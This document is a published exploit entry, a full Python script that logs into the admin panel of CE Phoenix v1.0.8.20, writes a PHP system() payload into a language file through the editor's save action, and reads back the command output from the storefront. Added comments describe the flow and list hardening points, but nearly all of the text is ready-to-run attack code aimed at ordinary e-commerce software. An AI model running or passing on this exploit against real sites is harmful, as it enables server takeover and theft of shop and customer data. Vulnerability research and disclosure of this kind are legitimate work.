CE Phoenix v1.0.8.20 - Remote Code Execution

  1. ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
  2. #### Date: 2023-11-25
  3. #### Exploit Author: tmrswrr
  4. #### Category: Webapps
  5. #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
  6. #### Version: v1.0.8.20
  7. #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
  8.  
  9. ## EXPLOIT :
  10.  
  11. import requests
  12. from bs4 import BeautifulSoup
  13. import sys
  14. import urllib.parse
  15. import random
  16. from time import sleep
  17.  
class colors:
    """ANSI SGR escape sequences used to colour the console banner.

    Each value is the ESC character (0x1b) followed by a CSI code. The
    attribute names are part of the script's interface (``colors.CRED`` etc.),
    so they are kept exactly as before; only the notation of the escape byte
    differs from the original.
    """

    # Generic attribute / bright-colour codes.
    OKBLUE = '\x1b[94m'
    WARNING = '\x1b[93m'
    FAIL = '\x1b[91m'
    ENDC = '\x1b[0m'
    BOLD = '\x1b[1m'
    UNDERLINE = '\x1b[4m'

    # Standard eight foreground colours, SGR 30-37.
    CBLACK = '\x1b[30m'
    CRED = '\x1b[31m'
    CGREEN = '\x1b[32m'
    CYELLOW = '\x1b[33m'
    CBLUE = '\x1b[34m'
    CVIOLET = '\x1b[35m'
    CBEIGE = '\x1b[36m'
    CWHITE = '\x1b[37m'
  33.  
  34.  
def entry_banner():
    """Print the tool banner one character at a time in a randomly chosen colour.

    The colour is selected by shuffling the palette and taking its first entry
    (same RNG consumption as before). Every character is written and flushed
    individually, followed by a short sleep, for a typewriter effect. The
    colour code is never reset afterwards.
    """
    palette = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE,
               colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE]
    random.shuffle(palette)

    text = palette[0] + """
    CE Phoenix v1.0.8.20 - Remote Code Execution \n
    Author: tmrswrr
   """
    out = sys.stdout
    for ch in text:
        out.write(ch)
        out.flush()
        sleep(0.0045)
  48.  
def get_formid_and_cookies(session, url):
    """GET *url* and return the page's hidden ``formid`` field plus the session's cookie jar.

    Args:
        session: A ``requests.Session``; any cookies the response sets remain on it.
        url: Page to fetch. Redirects are followed, so the form is read from the
            final landing page.

    Returns:
        ``(formid_value, session.cookies)`` when the response status is below 400
        and an ``<input name="formid">`` is present in the HTML; otherwise
        ``(None, None)``.
    """
    response = session.get(url, allow_redirects=True)
    # response.ok is only a status check (< 400); a 200 page without the form
    # still falls through to (None, None).
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            # NOTE(review): an input without a 'value' attribute raises KeyError here.
            return formid_input['value'], session.cookies
    return None, None
  57.  
def perform_exploit(session, url, username, password, command):
    """Log in to the admin panel and write a PHP snippet through the language-file editor.

    Flow, as the code below shows: (1) GET the language editor page to obtain
    the anti-CSRF ``formid`` and the ``cepcAdminID`` session cookie; (2) POST
    the credentials to ``login.php?action=process``; (3) re-read ``formid``
    from the post-login page; (4) POST a ``file_contents`` body holding a PHP
    ``system()`` call to ``define_language.php?...&action=save``; (5) GET the
    site root and print the whole response body.

    Defensive reading: every step depends on valid admin credentials, so the
    weakness turns an admin-account compromise into server-side code
    execution. Hardening points visible from this flow are restricting who can
    reach ``/admin/`` and the language editor, and alerting on POSTs to
    ``define_language.php`` with ``action=save`` whose ``file_contents``
    contains a ``<?php`` tag.

    Args:
        session: ``requests.Session`` that carries cookies between the steps.
        url: Site base URL. ``/admin/...`` is appended directly, so it is
            presumably expected without a trailing slash (not enforced here).
        username: Admin username submitted to ``login.php``.
        password: Admin password submitted to ``login.php``.
        command: Shell command string; it is ``quote_plus``-encoded and embedded
            in the PHP snippet verbatim otherwise.

    Returns:
        None. Progress lines and raw response bodies go to stdout; each failure
        prints a ``[-]`` line and returns early.
    """
    print("\n[+] Attempting to exploit the target...")

   
    # Editor page for the English language file; the GET also seeds the session cookie.
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        # Raises KeyError if the server did not set cepcAdminID. The session
        # already sends its cookie jar, so this header duplicates that value.
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

    # 'ok' only means status < 400; a re-rendered login page returned with 200
    # passes too, so a rejected login may only surface at the formid re-fetch below.
    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return

    print("[+] Login successful.")


    # The formid is re-read from wherever the login redirected to.
    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    # Body is pre-encoded by hand; decoded it is "<?php echo system('<command>');".
    # Passing a str to data= makes requests send it as the raw body.
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    # action=save is the write primitive: the language editor persists file_contents.
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

    # Again only a status check; a 200 does not prove the file was written.
    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

   
    # Fetches the storefront root and dumps the entire body. The output is
    # presumably visible there because the edited language file is included
    # on every page — inferred, not shown in this script.
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)  
  120.  
def main(base_url, username, password, command):
    """CLI entry point: announce the run, open an HTTP session and hand off to perform_exploit.

    Args:
        base_url: Target base URL (presumably without a trailing slash; see perform_exploit).
        username: Admin username.
        password: Admin password.
        command: Command string forwarded unchanged.

    Returns:
        None; all output is printed by perform_exploit.
    """
    print("\n[+] Starting the exploitation process...")
    http = requests.Session()
    perform_exploit(http, base_url, username, password, command)
  125.  
if __name__ == "__main__":
    entry_banner()

    # Four positional arguments are required; any extra ones are ignored.
    cli_args = sys.argv[1:]
    if len(cli_args) < 4:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)

    base_url, username, password, command = cli_args[:4]
    main(base_url, username, password, command)
  139.            